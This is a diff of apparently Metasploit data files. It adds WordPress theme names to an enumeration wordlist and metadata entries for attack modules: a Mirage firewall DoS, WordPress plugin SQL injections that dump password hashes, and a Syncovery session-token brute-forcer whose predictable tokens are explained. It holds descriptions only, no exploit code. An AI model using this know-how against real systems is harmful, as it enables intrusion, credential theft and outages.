 think-me
 thinker
@@ -19696,6 +21011,7 @@ third
 third-eye
 third-son
 third-style
+thirteen-blog
 thirteenmag
 thirtyseventyeight
 this-christmas
@@ -19744,6 +21060,7 @@ tiffany-lite
 tifology
 tiga
 tiger
+tigtiger
 tijaji
 tijarat-business
 tiki-time
@@ -19868,15 +21185,19 @@ toommorel-lite
 toommorel-theme-by-inkthemes
 toothpaste
 top-blog
+top-blogger
 top-business
+top-charity
 top-classic-cars
 top-event
 top-jewelry
 top-language-jobs-2
 top-mag
+top-newspaper
 top-premium-photoblog
 top-shop
 top-store
+top-stories
 top-story
 top-travel
 top5revs
@@ -19919,6 +21240,7 @@ tour
 tour-agency
 tour-operator
 tour-package
+tour-travel-agent
 tour-traveler
 tourable
 tourag
@@ -19935,6 +21257,7 @@ tove
 township-lite
 tp-autumn
 tp-blue
+tp-branded
 tp-iphone
 tp-philosophy
 tp-purpure
@@ -19955,6 +21278,7 @@ trade
 trade-business
 trade-hub
 trade-line
+trade-more
 tradebiz
 tradeup
 trading
@@ -19992,6 +21316,7 @@ transport-lite
 transport-movers
 transport-solutions
 transportation
+transportation-shipment
 transportex
 transporty
 travbo
@@ -20001,6 +21326,7 @@ travel-ace
 travel-advisor
 travel-agency
 travel-agency-booking
+travel-agent
 travel-and-tour
 travel-away
 travel-base
@@ -20016,9 +21342,11 @@ travel-booking
 travel-buzz
 travel-by-frelocaters
 travel-canvas
+travel-charm
 travel-club
 travel-company
 travel-diaries
+travel-diary
 travel-escape
 travel-eye
 travel-eye12312312
@@ -20027,6 +21355,7 @@ travel-guide
 travel-hub
 travel-in-italy
 travel-in-love
+travel-init
 travel-insight
 travel-inspired
 travel-is-my-life
@@ -20054,15 +21383,18 @@ travel-to-egypt
 travel-tour
 travel-tour-pro
 travel-tourism
+travel-trail
 travel-trek
 travel-trip-lite
 travel-ultimate
+travel-vlogger
 travel-voyage
 travel-way
 traveladdict-lite
 traveladdict-liteliye
 travelagency
 travelair
+travelbee
 travelberg
 travelbiz
 travelblog
@@ -20072,10 +21404,13 @@ traveler-blog-lite
 travelera-lite
 travelers
 travelers-blog
+travelholic
 travelia
 travelifestyle
 travelify
 travelingist
+travelism
+travelistic
 travelkit
 travellable
 travellandia
@@ -20095,6 +21430,7 @@ travern
 traverse-blog
 traverse-diary
 traversify-lite
+travey
 travia
 traza
 trcapital-lite
@@ -20116,21 +21452,26 @@ trend-shop
 trending
 trending-blog
 trending-mag
+trending-news
 trendmag
 trendmag-lite
 trendpress
 trendshop
 trendy
+trendy-blog
 trendy-green
+trendy-news
 tressimple
 treville
 treviso
+trex
 trexo
 triad
 trial
 trial-house-bootstrap-classic
 trialhouse-bootstrap-classic
 triangled
+triangulate
 tribal
 tribbiani
 tribe
@@ -20175,6 +21516,7 @@ tropical-beach-theme
 tropical-paradise
 tropicala
 tropicana
+trouvelot
 truble
 true-blue
 true-blue-hue
@@ -20248,6 +21590,7 @@ tutepress
 tutifruti
 tuto
 tutor
+tutor-academy
 tutor-starter
 tutorial
 tutorial-portfolio
@@ -20255,6 +21598,7 @@ tutorial-theme
 tutorialesmanu
 tutorstarter
 tutsup-two
+tutu
 tuấn-hiệp
 tv-boy-explode-black
 tw
@@ -20283,9 +21627,11 @@ tweetpress
 tweetsheep
 twelve
 twelve-14
+twelve-blog
 twelve-pixel
 twentiy-nineteen
 twenty
+twenty-17
 twenty-eightteen
 twenty-eleven
 twenty-eleven-alternative
@@ -20432,6 +21778,7 @@ twenty-twenty-one-child
 twenty-twenty-one-sidebar
 twenty-twenty-onee
 twenty-twenty-plus
+twenty-twenty-two-child
 twenty-twenty20
 twenty-two-five
 twenty11
@@ -20444,6 +21791,7 @@ twentyfourteen
 twentyfourteen-child
 twentynineteen
 twentyseventeen
+twentyseventeen-child
 twentysixteen
 twentysixteen-custom
 twentysixteen-customed-for-kishoredbn
@@ -20460,6 +21808,9 @@ twentytwelve-schema-org-child
 twentytwenty
 twentytwentyone
 twentytwentyone-child-wooden
+twentytwentythree
+twentytwentytwo
+twentytwentytwowcs2022
 twentyxlarge
 twentyxs
 twentyxs-child
@@ -20573,6 +21924,7 @@ ultra-seven
 ultrabootstrap
 ultralight
 ultrapress
+ultravel
 um
 uma
 uma-wp-theme
@@ -20588,6 +21940,7 @@ unakit
 unar
 unar-lite
 unax
+unblock
 unbox-tours
 uncode
 uncode-lite
@@ -20620,7 +21973,9 @@ undistracted-zen
 unfocus-green
 unfocused-blues
 unfold
+unfoldx
 uni-education
+uniblock
 unicare-lite
 unicon
 unicon-lite
@@ -20663,12 +22018,14 @@ universam-store-leader
 universe
 universe2
 university
+university-education-hub
 university-hub
 university-max
 university-web8
 university-wp
 university-zone
 unknown-uri-httpdemo-webulo1us-inabar1is
+unlimita
 unlimited
 unmarked
 unnamed-lite
@@ -20704,7 +22061,9 @@ upcart
 update-tucson
 updown-cloud
 upeo
+upeo-blog
 upeo-business
+upfront
 upfrontwp
 upify
 upliftingblog
@@ -20751,6 +22110,7 @@ utheme
 uticawp
 utieletronica
 utility
+utility-techup
 utilys
 utopia
 utouch-lite
@@ -20771,6 +22131,7 @@ vacation-lite
 vacation-lite1
 vacuous
 vagabond
+vagante
 vaje
 vajra
 valazi
@@ -20805,6 +22166,7 @@ vantage-premium
 vanty
 vape-multipurpose-minimal-shop
 vape-theme
+varela-blog
 varg
 variant
 variant-landing-page
@@ -20850,6 +22212,7 @@ vegeta
 veggie-lite
 veggie-lite1-2
 veggie-poem
+veggo-shop
 vei-do-ceu
 vei-do-saco
 veikals
@@ -20887,6 +22250,7 @@ verbosa
 verdant
 verge
 veridicta
+veritable
 veritas
 verity
 vermillon
@@ -20895,6 +22259,7 @@ veroxa
 versal
 versatile-business
 versatile-business-dark
+versatile-corporate
 versitility
 verso
 verso-lite
@@ -20929,8 +22294,10 @@ vg-sento
 viable-blog
 viable-fame
 viable-lite
+viaggiando
 viaggio-lite
 viala
+viandante
 viavi-blog
 vibe
 vibefolio-teaser-10
@@ -20948,14 +22315,19 @@ victoriana
 video
 video-adventure-theme
 video-blog
+video-podcasting
 video-sport-total
+video-streaming
 video-theme-adventure
 videoblog
 videobuzz
+videocast
 videofire
 videofy
 videographex
 videography
+videography-filmmaker
+videolife
 videomag
 videomaker
 videomax
@@ -20963,6 +22335,7 @@ videonowlite
 videoplace
 videopress
 videopro-shared-by-themes24x7-com
+videoshare
 videostories
 videoxl-free
 vidmag
@@ -20987,6 +22360,8 @@ viktor-classic
 viktor-lite
 villa-estate
 village
+villanelle
+villar
 vilva
 vina
 vinay
@@ -21005,6 +22380,7 @@ vintage-stamps-theme
 vintage-wall
 vintage1-camera1
 vintagemag
+vinyl-news-mag
 violet
 violet-fashion-theme
 violinesth
@@ -21054,6 +22430,7 @@ vishnu
 visia-store
 vision
 vision-lite
+visionwp
 visitpress
 viso
 viso-theme
@@ -21085,6 +22462,7 @@ vivex
 vivid-blog
 vivid-night
 vivita
+vivre
 vixka
 vixy-catch
 vizuit
@@ -21139,6 +22517,7 @@ vw-app-lite
 vw-application
 vw-automobile-lite
 vw-bakery
+vw-bakery-blocks
 vw-blog-magazine
 vw-book-store
 vw-car-rental
@@ -21149,6 +22528,7 @@ vw-consulting
 vw-corporate-business
 vw-corporate-lite
 vw-corporate-lite-2
+vw-dark
 vw-dentist
 vw-driving-school
 vw-eco-nature
@@ -21169,7 +22549,10 @@ vw-healthcare
 vw-hospital-lite
 vw-hotel
 vw-interior-designs
+vw-job-board
 vw-kids
+vw-kids-store
+vw-kindergarten
 vw-landing-page
 vw-lawyer-attorney
 vw-life-coach
@@ -21180,6 +22563,7 @@ vw-minimalist
 vw-mobile-app
 vw-mobile-app-red-canoa
 vw-newspaper
+vw-nutritionist-coach
 vw-one-page
 vw-painter
 vw-parallax
@@ -21229,9 +22613,11 @@ w018
 w1redtech
 w3css
 w3css-starter
+w3csspress
 w3t-fuseki
 w7c_iz
 wabc
+wabi
 wabi-sabi
 wacko
 wacool-hack-on-the-net
@@ -21245,6 +22631,8 @@ walili
 walker-charity
 walkermag
 walkernews
+walkerpress
+walkershop
 wall-street
 wallflower
 wallgreen
@@ -21266,6 +22654,7 @@ wapuu1-child
 waqas
 ward
 wardrobe
+warehouse-cargo
 warm-heart
 warm-home
 warm-ribbon
@@ -21279,6 +22668,7 @@ washing-center
 washington
 wasif
 wasteland
+watch-store
 watchertheme
 watches
 water
@@ -21287,6 +22677,7 @@ water-lily
 water-mark
 water-sports-club
 watercolor
+waterlava
 waterloo
 waternymph-and-dolphin
 waterside
@@ -21321,16 +22712,20 @@ web-20
 web-20-blue
 web-20-pinky
 web-20-simplified
+web-agency-elementor
 web-app
 web-artist
 web-conference
 web-design
 web-design-web8
+web-designer
 web-developer
+web-developer-elementor
 web-development
 web-grapple
 web-host
 web-hosting
+web-hosting-lite
 web-hosting-theme
 web-log
 web-minimalist-200901
@@ -21383,6 +22778,7 @@ webstarslite
 webstarterkitthirteen
 webstore
 webstrap
+webstudio-gtns
 webswp
 webtacs-1
 weburangbogor
@@ -21392,12 +22788,14 @@ wecare
 wecodeart
 wecodeart-framework
 wecodeart-old
+weddi-pro
 wedding
 wedding-band
 wedding-bells
 wedding-bells-lite
 wedding-bride
 wedding-couples
+wedding-hall
 wedding-happily-ever-after
 wedding-journal
 wedding-party
@@ -21419,10 +22817,14 @@ wedshot
 wefoster
 weh-lite
 wehpy
+wei
+weight-loss
 weight-loss-tea
 welcome
 welcomeholidays-uri-httpswordpress-orgthemestwentyseventeen
+welding-services
 well-being
+well-book
 well-built
 well-rounded-redux-blue
 wellbeing
@@ -21432,13 +22834,16 @@ wellness
 wellness-child
 wellness-coach-lite
 wen-associate
+wen-biz
 wen-business
 wen-commerce
 wen-corporate
 wen-travel
 wen-travel-blog
+wen-travel-corporate
 wen-travel-dark
 wen-travel-modern
+wen-travel-photography
 wepora
 werka
 west
@@ -21526,6 +22931,7 @@ whitey08-green
 whitish
 whitish-lite
 whitney
+wholesales
 wholly
 whoop
 why-hello-there
@@ -21634,6 +23040,7 @@ wittgenstein
 wix
 wiz-ecommerce
 wiziapp-smooth-touch
+wk-finance
 wk-wow
 wkeducation
 wlow
@@ -21649,6 +23056,7 @@ womenmagaz
 wonder
 wondrous
 woo
+woo-shop
 woobie
 wooclean
 woocommerce-starter
@@ -21659,6 +23067,8 @@ wood-master
 wood-people
 wood-theme
 woodberry
+woodcraft-lite
+woodcut
 wooden
 wooden-and-white-style
 wooden-by-jason
@@ -21682,12 +23092,14 @@ woodsauce
 woodword
 woodwork-lite
 woodworking
+woodworking-carpenter
 woody
 woody-smooth
 wooeco
 wooketing
 woolab
 woomart
+wooshop-wp
 woosti
 woostifi
 woostify
@@ -21744,6 +23156,7 @@ wordpress-unix
 wordpress-video-theme
 words
 words-blog
+words-lite
 wordsmith
 wordsmith-anvil
 wordsmith-blog
@@ -21755,9 +23168,11 @@ wordzilla
 worf
 work-and-travel
 workart
+workart-business
 workflow
 workfree
 working-papers
+workout-lite
 workpress
 worksblog
 workspace-theme
@@ -21820,6 +23235,7 @@ wp-boxes
 wp-brown
 wp-bs-mix-news
 wp-business
+wp-business-builder
 wp-c_green
 wp-castle
 wp-casual
@@ -21896,7 +23312,9 @@ wp-media-twentyfive
 wp-meliora
 wp-metrics
 wp-metroui
+wp-minimalist
 wp-mint-magazine
+wp-moose
 wp-movies
 wp-mozilla-community-theme-v2
 wp-my-business
@@ -21904,6 +23322,7 @@ wp-nathy
 wp-news-classic
 wp-news-stream
 wp-newsmagazine
+wp-newspaper
 wp-nice-mix
 wp-notebook
 wp-notes
@@ -22009,12 +23428,15 @@ wpbyd
 wpcake
 wpcan
 wpchimp-countdown
+wpckid
 wpclick
 wpcmart
 wpcmedical
 wpcomic
+wpconfigurator
 wpcount
 wpcouponcode
+wpcpet
 wpcplant
 wpcrest
 wpcrux
@@ -22034,6 +23456,7 @@ wpf-authority
 wpf-flaty
 wpf-ultraresponsive
 wpfastslide
+wpflavour
 wpfolio
 wpfolio-three
 wpgalaxy-magazine
@@ -22041,12 +23464,14 @@ wpgist
 wpgrass
 wpgumby
 wpherald_lite
+wphester
 wpi-aboutme
 wpideo
 wpindexatic
 wping-metro
 wpj
 wpjobman
+wpkites
 wpl-twentyeight
 wplab-pro-wpcms
 wplabo-aries
@@ -22128,6 +23553,7 @@ writee
 writee-child
 writee-grid
 writee-parsi
+writemag
 writer
 writer-blog
 writera
@@ -22138,6 +23564,7 @@ writers-blogily
 writers-desk
 writers-quill
 writerstrap
+writeup
 writhem-blog
 writing-board
 writing-desk
@@ -22189,9 +23616,11 @@ x-mas
 x-portfolio
 x-shop
 x-store
+x-t9
 x-view
 x2
 x2-lite
+x3p0-reflections
 x6
 xabstract
 xaklin
@@ -22218,6 +23647,7 @@ xiando-one
 xianrensea
 xicoofficial
 xid1theme
+xidea
 xin
 xin-magazine
 xinxin
@@ -22242,6 +23672,8 @@ xpand-blog
 xpand-news
 xperson-lite
 xpinkfevertlx
+xpomagazine
+xposenews
 xpressmag
 xpro
 xproweb
@@ -22323,6 +23755,7 @@ yepza
 yes-co-ores-theme
 yesp
 yeti-5
+yeti-blog
 yeuloli
 yeyita
 yg-desire
@@ -22330,10 +23763,12 @@ yhsnews
 yifengxuan
 yinyang
 yith-proteo
+yith-wonder
 yleave
 ymac
 ymflyingred
 ymoo
+ynet-contractor
 yo-manga
 yo-yo-po
 yo_fik
@@ -22341,6 +23776,7 @@ yocto
 yoga
 yoga-coach
 yoga-fitness
+yoga-park
 yoga-studio
 yoga_guru
 yogaclub-lite
@@ -22359,7 +23795,9 @@ yomel
 yonarex
 yoneko
 yoo-developer
+yordered-desktop
 york-lite
+york-press
 yosemite
 yosemite-lite
 yosemite-lite1
@@ -22387,8 +23825,13 @@ yugen
 yui
 yui-grid-css
 yuiyui
+yuki
+yuki-agency
+yuki-magazine
 yukti
 yule
+yuma
+yuma-personal
 yume
 yume-tan
 yummy
@@ -22463,6 +23906,7 @@ zeestyle
 zeestylepro
 zeesynergie
 zeetasty
+zeever
 zeevision
 zeko-lite
 zelia
@@ -22485,6 +23929,7 @@ zenga-club
 zengardenwedding
 zenhabits-reloaded
 zenimalist
+zenithwp
 zenlife
 zenlite
 zenmacrame
@@ -22533,6 +23978,7 @@ zetaone
 zeus
 zfirst
 zgrey
+zheme
 zhuti
 zica-lite-one-page
 zifer-child
@@ -22570,7 +24016,9 @@ zm-tech-black-red
 zm-theme
 zmartoffcial
 zmooncake
+zmt-modular
 znktheme-uri-httpssketchthemes-compremium-themesappointment-booking-wordpress-theme-for-consultants
+zodiac-astrology
 zodiac-lite
 zoe
 zoko
@@ -5220,7 +5220,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-10-28 09:19:43 +0000",
+    "mod_time": "2022-11-14 12:27:38 +0000",
    "path": "/modules/auxiliary/admin/ldap/rbcd.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/rbcd",
@@ -9869,7 +9869,7 @@
      "hdm <x@hdm.io>",
      "h00die"
    ],
-    "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n        acquired from Windows systems. The module will only crack LANMAN/NTLM hashes.\n        LANMAN is format 3000 in hashcat.\n        NTLM is format 1000 in hashcat.",
+    "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n        acquired from Windows systems. The module will only crack LANMAN/NTLM hashes.\n        LANMAN is format 3000 in hashcat.\n        NTLM is format 1000 in hashcat.\n        MSCASH is format 1100 in hashcat.\n        MSCASH2 is format 2100 in hashcat.\n        NetNTLM is format 5500 in hashcat.\n        NetNTLMv2 is format 5600 in hashcat.",
    "references": [

    ],
@@ -9883,7 +9883,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-01-27 13:50:39 +0000",
+    "mod_time": "2023-01-08 16:54:36 +0000",
    "path": "/modules/auxiliary/analyze/crack_windows.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_windows",
@@ -12633,6 +12633,56 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_dos/mirageos/qubes_mirage_firewall_dos": {
+    "name": "Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit",
+    "fullname": "auxiliary/dos/mirageos/qubes_mirage_firewall_dos",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-12-04",
+    "type": "auxiliary",
+    "author": [
+      "Krzysztof Burghardt <krzysztof@burghardt.pl>"
+    ],
+    "description": "This module allows remote attackers to cause a denial of service (DoS)\n          in Mirage firewall for QubesOS 0.8.0-0.8.3 via a specifically crafted UDP request.",
+    "references": [
+      "CVE-2022-46770",
+      "URL-https://mirage.io/blog/MSA03",
+      "URL-https://github.com/mirage/qubes-mirage-firewall/issues/166"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-12-09 17:20:13 +0000",
+    "path": "/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb",
+    "is_install_path": true,
+    "ref_name": "dos/mirageos/qubes_mirage_firewall_dos",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+        "ioc-in-logs",
+        "physical-effects"
+      ],
+      "SideEffects": [
+        "unreliable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_dos/misc/dopewars": {
    "name": "Dopewars Denial of Service",
    "fullname": "auxiliary/dos/misc/dopewars",
@@ -13412,7 +13462,7 @@
      "smtps"
    ],
    "targets": null,
-    "mod_time": "2022-02-14 09:01:05 +0000",
+    "mod_time": "2023-01-04 14:45:58 +0000",
    "path": "/modules/auxiliary/dos/smtp/sendmail_prescan.rb",
    "is_install_path": true,
    "ref_name": "dos/smtp/sendmail_prescan",
@@ -13777,7 +13827,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/auxiliary/dos/upnp/miniupnpd_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/upnp/miniupnpd_dos",
@@ -15496,7 +15546,7 @@
      "Lnk Creation Code by Mubix",
      "asoto-r7"
    ],
-    "description": "This module dependent on the given filename extension creates either\n          a .lnk, .scf, .url, .xml, or desktop.ini file which includes a reference\n          to the the specified remote host, causing SMB connections to be initiated\n          from any user that views the file.",
+    "description": "This module dependent on the given filename extension creates either\n          a .lnk, .scf, .url, .xml, or desktop.ini file which includes a reference\n          to the specified remote host, causing SMB connections to be initiated\n          from any user that views the file.",
    "references": [
      "URL-https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018",
      "URL-https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/",
@@ -15512,7 +15562,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/auxiliary/fileformat/multidrop.rb",
    "is_install_path": true,
    "ref_name": "fileformat/multidrop",
@@ -18237,7 +18287,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-02-23 16:27:12 +0000",
+    "mod_time": "2023-01-05 10:38:09 +0000",
    "path": "/modules/auxiliary/gather/exchange_proxylogon_collector.rb",
    "is_install_path": true,
    "ref_name": "gather/exchange_proxylogon_collector",
@@ -19696,7 +19746,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-11-07 10:28:43 +0000",
+    "mod_time": "2022-12-07 10:48:07 +0000",
    "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -19791,7 +19841,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-10-28 14:16:49 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/auxiliary/gather/ldap_query.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_query",
@@ -21938,6 +21988,66 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/wp_bookingpress_category_services_sqli": {
+    "name": "Wordpress BookingPress bookingpress_front_get_category_services SQLi",
+    "fullname": "auxiliary/gather/wp_bookingpress_category_services_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-02-28",
+    "type": "auxiliary",
+    "author": [
+      "cydave",
+      "destr4ct",
+      "jheysel-r7"
+    ],
+    "description": "The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied data\n          in the `total_service` parameter of the `bookingpress_front_get_category_services` AJAX action\n          (available to unauthenticated users), prior to using it in a dynamically constructed SQL query.\n          As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive\n          data from the backend database such as usernames and password hashes.\n\n          This module uses this vulnerability to dump the list of WordPress users and their associated\n          email addresses and password hashes for cracking offline.",
+    "references": [
+      "URL-https://github.com/destr4ct/CVE-2022-0739",
+      "WPVDB-388cd42d-b61a-42a4-8604-99b812db2357",
+      "CVE-2022-0739"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-11-15 09:08:38 +0000",
+    "path": "/modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "gather/wp_bookingpress_category_services_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/wp_ultimate_csv_importer_user_extract": {
    "name": "WordPress Ultimate CSV Importer User Table Extract",
    "fullname": "auxiliary/gather/wp_ultimate_csv_importer_user_extract",
@@ -34317,7 +34427,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_static_cert_scanner",
@@ -35108,6 +35218,119 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/syncovery_linux_login": {
+    "name": "Syncovery For Linux Web-GUI Login Utility",
+    "fullname": "auxiliary/scanner/http/syncovery_linux_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Jan Rude"
+    ],
+    "description": "This module will attempt to authenticate to Syncovery File Sync & Backup Software For Linux Web-GUI.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 8999,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-09-16 13:34:06 +0000",
+    "path": "/modules/auxiliary/scanner/http/syncovery_linux_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/syncovery_linux_login",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_scanner/http/syncovery_linux_token_cve_2022_36536": {
+    "name": "Syncovery For Linux Web-GUI Session Token Brute-Forcer",
+    "fullname": "auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-09-06",
+    "type": "auxiliary",
+    "author": [
+      "Jan Rude"
+    ],
+    "description": "This module attempts to brute-force a valid session token for the Syncovery File Sync & Backup Software Web-GUI\n          by generating all possible tokens, for every second between 'DateTime.now' and the given X day(s).\n          By default today and yesterday (DAYS = 1) will be checked. If a valid session token is found, the module stops.\n          The vulnerability exists, because in Syncovery session tokens are basically just base64(m/d/Y H:M:S) at the time\n          of the login instead of a random token.\n          If a user does not log out (Syncovery v8.x has no logout) session tokens will remain valid until reboot.",
+    "references": [
+      "URL-https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/",
+      "CVE-2022-36536"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 8999,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-12-14 08:59:53 +0000",
+    "path": "/modules/auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/syncovery_linux_token_cve_2022_36536",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/synology_forget_passwd_user_enum": {
    "name": "Synology Forget Password User Enumeration Scanner",
    "fullname": "auxiliary/scanner/http/synology_forget_passwd_user_enum",
@@ -35412,7 +35635,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-11-27 15:35:34 +0000",
    "path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tomcat_mgr_login",
@@ -37545,6 +37768,64 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/wp_paid_membership_pro_code_sqli": {
+    "name": "Wordpress Paid Membership Pro code Unauthenticated SQLi",
+    "fullname": "auxiliary/scanner/http/wp_paid_membership_pro_code_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-01-12",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "Joshua Martinelle"
+    ],
+    "description": "Paid Membership Pro, a WordPress plugin,\n          prior to 2.9.8 is affected by an unauthenticated SQL injection via the\n          `code` parameter.\n\n          Remote attackers can exploit this vulnerability to dump usernames and password hashes\n          from the `wp_users` table of the affected WordPress installation. These password hashes\n          can then be cracked offline using tools such as Hashcat to obtain valid login\n          credentials for the affected WordPress installation.",
+    "references": [
+      "CVE-2023-23488",
+      "URL-https://www.tenable.com/security/research/tra-2023-2"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-01-18 16:21:11 +0000",
+    "path": "/modules/auxiliary/scanner/http/wp_paid_membership_pro_code_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/wp_paid_membership_pro_code_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/wp_registrationmagic_sqli": {
    "name": "Wordpress RegistrationMagic task_ids Authenticated SQLi",
    "fullname": "auxiliary/scanner/http/wp_registrationmagic_sqli",
@@ -45943,7 +46224,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-07-19 14:47:39 +0000",
+    "mod_time": "2022-10-15 16:42:30 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/wmiexec.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/wmiexec",
@@ -46159,7 +46440,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-10-10 10:58:14 +0000",
+    "mod_time": "2023-01-09 11:23:26 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumshares",
@@ -46465,7 +46746,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-03-10 13:09:18 +0000",
+    "mod_time": "2023-01-12 09:29:53 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_version",
@@ -46602,7 +46883,7 @@
      "smtps"
    ],
    "targets": null,
-    "mod_time": "2022-02-14 09:01:05 +0000",
+    "mod_time": "2023-01-04 14:45:58 +0000",
    "path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_relay",
@@ -47037,7 +47318,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-11-01 14:22:49 +0000",
    "path": "/modules/auxiliary/scanner/snmp/snmp_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enum",
@@ -47117,7 +47398,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-11-01 14:22:49 +0000",
    "path": "/modules/auxiliary/scanner/snmp/snmp_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enumshares",
@@ -47155,7 +47436,7 @@

    ],
